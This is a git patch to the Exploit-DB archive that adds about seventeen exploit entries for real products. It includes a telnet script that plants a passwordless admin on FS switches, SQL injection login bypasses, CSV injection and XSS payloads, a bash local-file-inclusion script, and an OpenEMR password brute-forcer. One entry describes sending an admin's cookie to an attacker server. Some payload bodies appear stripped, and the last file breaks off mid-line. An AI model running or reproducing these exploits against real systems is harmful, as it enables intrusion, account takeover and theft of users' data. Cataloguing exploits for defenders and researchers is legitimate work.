From 668314bbda0333ab110c855ce43adf827bda0e9c Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 3 May 2023 00:16:23 +0000 Subject: [PATCH] DB: 2023-05-03 19 changes to exploits/shellcodes/ghdb FS-S3900-24T4S - Privilege Escalation Virtual Reception v1.0 - Web Server Directory Traversal admidio v4.2.5 - CSV Injection Companymaps v8.0 - Stored Cross Site Scripting (XSS) GLPI 9.5.7 - Username Enumeration OpenEMR v7.0.1 - Authentication credentials brute force PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) PHPJabbers Simple CMS 5.0 - SQL Injection PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) phpMyFAQ v3.1.12 - CSV Injection projectSend r1605 - Private file download revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - File Inclusion RCE SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Advanced Host Monitor v12.56 - Unquoted Service Path MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control --- exploits/hardware/local/51414.py | 48 +++++++++++++ exploits/multiple/webapps/51142.txt | 1 + exploits/php/webapps/51398.txt | 48 +++++++++++++ exploits/php/webapps/51399.txt | 20 ++++++ exploits/php/webapps/51400.txt | 40 +++++++++++ exploits/php/webapps/51401.txt | 49 ++++++++++++++ exploits/php/webapps/51402.txt | 21 ++++++ exploits/php/webapps/51403.txt | 67 +++++++++++++++++++ exploits/php/webapps/51404.sh | 60 +++++++++++++++++ exploits/php/webapps/51411.txt | 100 ++++++++++++++++++++++++++++ exploits/php/webapps/51413.py | 90 +++++++++++++++++++++++++ exploits/php/webapps/51415.txt | 46 +++++++++++++ exploits/php/webapps/51416.txt | 40 +++++++++++ exploits/php/webapps/51417.txt | 20 ++++++ exploits/php/webapps/51418.py | 59 ++++++++++++++++ exploits/windows/local/51410.txt | 37 ++++++++++ exploits/windows/local/51412.txt | 59 ++++++++++++++++ files_exploits.csv | 18 ++++- ghdb.xml | 60 +++++++++++++++++ 19 files changed, 882 insertions(+), 1 deletion(-) create mode 100755 exploits/hardware/local/51414.py create mode 100644 exploits/php/webapps/51398.txt create mode 100644 exploits/php/webapps/51399.txt create mode 100644 exploits/php/webapps/51400.txt create mode 100644 exploits/php/webapps/51401.txt create mode 100644 exploits/php/webapps/51402.txt create mode 100644 exploits/php/webapps/51403.txt create mode 100755 exploits/php/webapps/51404.sh create mode 100644 exploits/php/webapps/51411.txt create mode 100755 exploits/php/webapps/51413.py create mode 100644 exploits/php/webapps/51415.txt create mode 100644 exploits/php/webapps/51416.txt create mode 100644 exploits/php/webapps/51417.txt create mode 100755 exploits/php/webapps/51418.py create mode 100644 exploits/windows/local/51410.txt create mode 100644 exploits/windows/local/51412.txt diff --git a/exploits/hardware/local/51414.py b/exploits/hardware/local/51414.py new file mode 100755 index 000000000..e07e51ccb --- /dev/null +++ b/exploits/hardware/local/51414.py @@ -0,0 +1,48 @@ +# Exploit Title: FS-S3900-24T4S Privilege Escalation +# Date: 29/04/2023 +# Exploit Author: Daniele Linguaglossa & Alberto Bruscino +# Vendor Homepage: https://www.fs.com/ +# Software Link: not available +# Version: latest +# Tested on: latest +# CVE : CVE-2023-30350 + +import sys +import telnetlib + + +def exploit(args): + print(args) + if len(args) != 1: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + else: + ip = args[0] + try: + with telnetlib.Telnet(ip, 23) as tn: + try: + tn.read_until(b"Username: ") + tn.write(b"guest\r\n") + tn.read_until(b"Password: ") + tn.write(b"guest\r\n") + tn.read_until(b">") + tn.write(b"enable\r\n") + tn.read_until(b"Password: ") + tn.write(b"super\r\n") + tn.read_until(b"#") + tn.write(b"configure terminal\r\n") + tn.read_until(b"(config)#") + tn.write(b"username admin nopassword\r\n") + tn.read_until(b"(config)#") + print( + "Exploit success, you can now login with username: admin and password: ") + tn.close() + except KeyboardInterrupt: + print("Exploit failed") + tn.close() + except ConnectionRefusedError: + print("Connection refused") + + +if __name__ == "__main__": + exploit(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/multiple/webapps/51142.txt b/exploits/multiple/webapps/51142.txt index 15dd2764a..fc4eed6b3 100644 --- a/exploits/multiple/webapps/51142.txt +++ b/exploits/multiple/webapps/51142.txt @@ -3,6 +3,7 @@ # Vendor Homepage: https://www.virtualreception.nl/ # Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY # Tested on: all +# CVE-ID: CVE-2023-25289 We discovered the web server of the Virtual Reception appliance is prone to an unauthenticated directory traversal vulnerability. This allows an diff --git a/exploits/php/webapps/51398.txt b/exploits/php/webapps/51398.txt new file mode 100644 index 000000000..23074a717 --- /dev/null +++ b/exploits/php/webapps/51398.txt @@ -0,0 +1,48 @@ +# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS) +# Google Dork: None +# Date: 4/26/2023 +# Exploit Author: Or4nG.M4n +# Vendor Homepage: https://github.com/jcwebhole +# Software Link: https://github.com/jcwebhole/php_restaurants +# Version: 1.0 + + +functions.php + +function login(){ +global $conn; +$email = $_POST['email']; +$pw = $_POST['password']; + +$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = +'".md5($pw)."'"; <-- there is No filter to secure sql query +parm[email][password] +$result = $conn->query($sql); +if ($result->num_rows > 0) { +while($row = $result->fetch_assoc()) { +setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day +header('location: index.php'); +} +} else { +header('location: login.php?m=Wrong Password'); +} + +} + +login bypass at admin page /rest1/admin/login.php + +email & password : ' OR 1=1 -- <- add [space] end of the payload + +cross site scripting main page /index.php + +xhttp.open("GET", "functions.php?f=getRestaurants + ", true); +xhttp.send(); + + <-- when you insert your'e payload don't forget to add +like + +xss payload : \ No newline at end of file diff --git a/exploits/php/webapps/51399.txt b/exploits/php/webapps/51399.txt new file mode 100644 index 000000000..482c345e1 --- /dev/null +++ b/exploits/php/webapps/51399.txt @@ -0,0 +1,20 @@ +Exploit Title: phpMyFAQ v3.1.12 - CSV Injection +Application: phpMyFAQ +Version: 3.1.12 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://www.phpmyfaq.de/ +Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip +Date of found: 21.04.2023 +Author: Mirabbas Ağalarov +Tested on: Windows + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to user control panel and change name as =calc|a!z| and save +step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator + +payload: calc|a!z| +Poc video: https://youtu.be/lXwaexX-1uU \ No newline at end of file diff --git a/exploits/php/webapps/51400.txt b/exploits/php/webapps/51400.txt new file mode 100644 index 000000000..c53fa7eac --- /dev/null +++ b/exploits/php/webapps/51400.txt @@ -0,0 +1,40 @@ +Exploit Title: projectSend r1605 - Private file download +Application: projectSend +Version: r1605 +Bugs: IDOR +Technology: PHP +Vendor URL: https://www.projectsend.org/ +Software Link: https://www.projectsend.org/ +Date of found: 24-01-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + + +Technical Details & POC +======================================== + +1.Access to private files of any user, including admin + + +just change id + + + +GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1 +Host: localhost +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/manage-files.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/51401.txt b/exploits/php/webapps/51401.txt new file mode 100644 index 000000000..9b4fa2224 --- /dev/null +++ b/exploits/php/webapps/51401.txt @@ -0,0 +1,49 @@ +Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS) +Application: revive-adserver +Version: 5.4.1 +Bugs: XSS +Technology: PHP +Vendor URL: https://www.revive-adserver.com/ +Software Link: https://www.revive-adserver.com/download/ +Date of found: 31-03-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1. Go to create banner +2. select the advanced section +3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) + +POST /www/admin/banner-advanced.php HTTP/1.1 +Host: localhost +Content-Length: 213 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894 +Connection: close + +clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet + + + +We are sending this link to the admin. then if admin clicks it will be exposed to xss + +http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 \ No newline at end of file diff --git a/exploits/php/webapps/51402.txt b/exploits/php/webapps/51402.txt new file mode 100644 index 000000000..15abe3131 --- /dev/null +++ b/exploits/php/webapps/51402.txt @@ -0,0 +1,21 @@ +Exploit Title: admidio v4.2.5 - CSV Injection +Application: admidio +Version: 4.2.5 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://www.admidio.org/ +Software Link: https://www.admidio.org/download.php +Date of found: 26.04.2023 +Author: Mirabbas Ağalarov +Tested on: Windows + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) +step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2) + +payload: =calc|a!z| + +Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ \ No newline at end of file diff --git a/exploits/php/webapps/51403.txt b/exploits/php/webapps/51403.txt new file mode 100644 index 000000000..a8fece970 --- /dev/null +++ b/exploits/php/webapps/51403.txt @@ -0,0 +1,67 @@ +## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE +## Author: nu11secur1ty +## Date: 04.26.2023 +## Vendor: https://docs.s9y.org/index.html +## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0 +## Reference: https://portswigger.net/web-security/file-upload +## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload + +## Description: +The already authenticated attacker can upload HTML files on the +server, which is absolutely dangerous and STUPID +In this file, the attacker can be codding a malicious web-socket +responder that can connect with some nasty webserver somewhere. It +depends on the scenario, the attacker can steal every day very +sensitive information, for a very long period of time, until the other +users will know that something is not ok with this system, and they +decide to stop using her, but maybe they will be too late for this +decision. + +STATUS: HIGH Vulnerability + +[+]Exploit: +```HTML + + + + + NodeJS WebSocket Server + + +

You have just sent a message to your attacker,
+

that you are already connected to him.

+ + + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0) + +## Proof and Exploit: +[href](https://streamable.com/2s80z6) + +## Time spend: +01:27:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51404.sh b/exploits/php/webapps/51404.sh new file mode 100755 index 000000000..af5ec9162 --- /dev/null +++ b/exploits/php/webapps/51404.sh @@ -0,0 +1,60 @@ +# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion +# Date: 27-04-2023 +# Exploit Author: Felipe Alcantara (Filiplain) +# Vendor Homepage: https://www.softexpert.com/ +# Version: 2.0 < 2.1.3 +# Tested on: Kali Linux +# CVE : CVE-2023-30330 +# SE Suite versions tested: 2.0.15.31, 2.0.15.115 + +# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330 + + +#!/bin/bash + +# Usage: ./lfi-poc.sh + +target=$1 +u=$2 +p=$3 +file=$(echo -n "$4"|base64 -w 0) + +end="\033[0m\e[0m" +red="\e[0;31m\033[1m" +blue="\e[0;34m\033[1m" + +echo -e "\n$4 : $file\n" + +echo -e "${blue}\nGETTING SESSION COOKIE${end}" +cookie=$(curl -i -s -k -X $'POST' \ + -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ + -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \ + --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \ + "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2) + +echo "cookie: $cookie" + +function LFI () { + +curl -s -k -X $'POST' \ + -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \ + -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \ + --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \ + "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php" + +} + +echo -e "${blue}\nExploiting LFI:${end}" +LFI + +function logout () { +curl -i -s -k -X $'POST' \ + -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \ + -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \ + "https://$target/softexpert/selogout" +} + +echo -e "${blue}\nLogging out${end}" +logout >/dev/null +echo -e "\n\nDone!" \ No newline at end of file diff --git a/exploits/php/webapps/51411.txt b/exploits/php/webapps/51411.txt new file mode 100644 index 000000000..5e2bb00c8 --- /dev/null +++ b/exploits/php/webapps/51411.txt @@ -0,0 +1,100 @@ +Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) +Application: PHPFusion +Version: 9.10.30 +Bugs: XSS +Technology: PHP +Vendor URL: https://www.php-fusion.co.uk/home.php +Software Link: https://sourceforge.net/projects/php-fusion/ +Date of found: 28-04-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw) +2. upload malicious svg file + +svg file content ===> + + + + + + + + + + +poc request: + + +POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1 +Host: localhost +Content-Length: 1198 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-platform: "Linux" +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0 +Connection: close + +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="reqid" + +187c77be8e52cf +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="cmd" + +upload +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="target" + +l1_Lw +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]" + +SVG_XSS.svg +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" +Content-Type: image/svg+xml + + + + + + + + +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="mtime[]" + +1681116842 +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="overwrite" + +0 +------WebKitFormBoundaryxF2jB690PpLWInAA-- + + +3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file( +http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg) + + + +poc video : https://youtu.be/6yBLnRH8pOY \ No newline at end of file diff --git a/exploits/php/webapps/51413.py b/exploits/php/webapps/51413.py new file mode 100755 index 000000000..df7e1bf07 --- /dev/null +++ b/exploits/php/webapps/51413.py @@ -0,0 +1,90 @@ +# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force +# Date: 2023-04-28 +# Exploit Author: abhhi (Abhishek Birdawade) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz +# Version: 7.0.1 +# Tested on: Windows + +''' +Example Usage: +- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt +''' + +import requests +import sys +import argparse, textwrap +from pwn import * + +#Expected Arguments +parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, +epilog=textwrap.dedent(''' +Exploit Usage : +python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt +python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt +python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) + +parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") +parser.add_argument("-u","--username", help="Username to Bruteforce for.") +parser.add_argument("-ul","--userlist", help="Username Dictionary") +parser.add_argument("-p","--passlist", help="Password Dictionary") +args = parser.parse_args() + +if len(sys.argv) < 2: + print (f"Exploit Usage: python3 exploitBF.py -h") + sys.exit(1) + +# Variable +LoginPage = args.url +Username = args.username +Username_list = args.userlist +Password_list = args.passlist + +log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ') + +def login(Username,Password): + session = requests.session() + r = session.get(LoginPage) + +# Progress Check + process = log.progress('Brute Force') + +#Specifying Headers Value + headerscontent = { + 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', + 'Referer' : f"{LoginPage}", + 'Origin' : f"{LoginPage}", + } + +#POST REQ data + postreqcontent = { + 'new_login_session_management' : 1, + 'languageChoice' : 1, + 'authUser' : f"{Username}", + 'clearPass' : f"{Password}" + } + +#Sending POST REQ + r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) + +#Printing Username:Password + process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) + +#Conditional loops + if 'Location' in r.headers: + if "/interface/main/tabs/main.php" in r.headers['Location']: + print() + log.info(f'SUCCESS !!') + log.success(f"Use Credential -> {Username}:{Password}") + sys.exit(0) + +#Reading User.txt & Pass.txt files +if Username_list: + userfile = open(Username_list).readlines() + for Username in userfile: + Username = Username.strip() + +passfile = open(Password_list).readlines() +for Password in passfile: + Password = Password.strip() + login(Username,Password) \ No newline at end of file diff --git a/exploits/php/webapps/51415.txt b/exploits/php/webapps/51415.txt new file mode 100644 index 000000000..3f0580692 --- /dev/null +++ b/exploits/php/webapps/51415.txt @@ -0,0 +1,46 @@ +# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) +# Date: 2023-04-29 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.phpjabbers.com/faq.php +# Software Link: https://www.phpjabbers.com/simple-cms/ +# Version: 5.0 +# Tested on: Kali Linux + +### Steps to Reproduce ### + +- Please login from this address: +https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin +- Click on the "Add Section" button. +- Then enter the payload (">) in the +"Section" box and save it. +- Boom! An alert message saying "Stored" will appear in front of you. + +### PoC Request ### + +POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate +HTTP/1.1 +Host: localhost +Cookie: pj_sid=PJ1.0.6199026527.1682777172; +pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; +PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; +pjd=7l9bb4ubmknrdbns46j7g5cqn7 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 371 +Origin: https://localhost +Referer: +https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T \ No newline at end of file diff --git a/exploits/php/webapps/51416.txt b/exploits/php/webapps/51416.txt new file mode 100644 index 000000000..2bcd1849a --- /dev/null +++ b/exploits/php/webapps/51416.txt @@ -0,0 +1,40 @@ +# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection +# Date: 2023-04-29 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.phpjabbers.com/faq.php +# Software Link: https://www.phpjabbers.com/simple-cms/ +# Version: 5.0 +# Tested on: Kali Linux + +### Request ### + +GET +/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 +HTTP/1.1 +Accept: */* +x-requested-with: XMLHttpRequest +Referer: https://localhost/simplecms/preview.php?lid=1 +Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; +_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; +pjd_simplecms=1; last_position=%2F +Accept-Encoding: gzip,deflate,br +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Host: localhost +Connection: Keep-alive + +### Parameter & Payloads ### + +Parameter: column (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) +THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) +END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 + + Type: error-based + Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (EXTRACTVALUE) + Payload: action=pjActionGetFile&column=2 AND +EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT +(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 \ No newline at end of file diff --git a/exploits/php/webapps/51417.txt b/exploits/php/webapps/51417.txt new file mode 100644 index 000000000..2ba30cf7f --- /dev/null +++ b/exploits/php/webapps/51417.txt @@ -0,0 +1,20 @@ +# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS) +# Date: 27.04.2023 +# Exploit Author: Lucas Noki (0xPrototype) +# Vendor Homepage: https://github.com/vogtmh +# Software Link: https://github.com/vogtmh/cmaps +# Version: 8.0 +# Tested on: Mac, Windows, Linux +# CVE : CVE-2023-29983 + +*Steps to reproduce:* +1. Clone the repository and install the application +2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token= +3. The payload used is: +4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough. +5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog +6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter + +In a real world case you would need to wait for the admin to log into the application and open the auditlog tab. + +Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload. \ No newline at end of file diff --git a/exploits/php/webapps/51418.py b/exploits/php/webapps/51418.py new file mode 100755 index 000000000..fe2369222 --- /dev/null +++ b/exploits/php/webapps/51418.py @@ -0,0 +1,59 @@ +# Exploit Title: GLPI 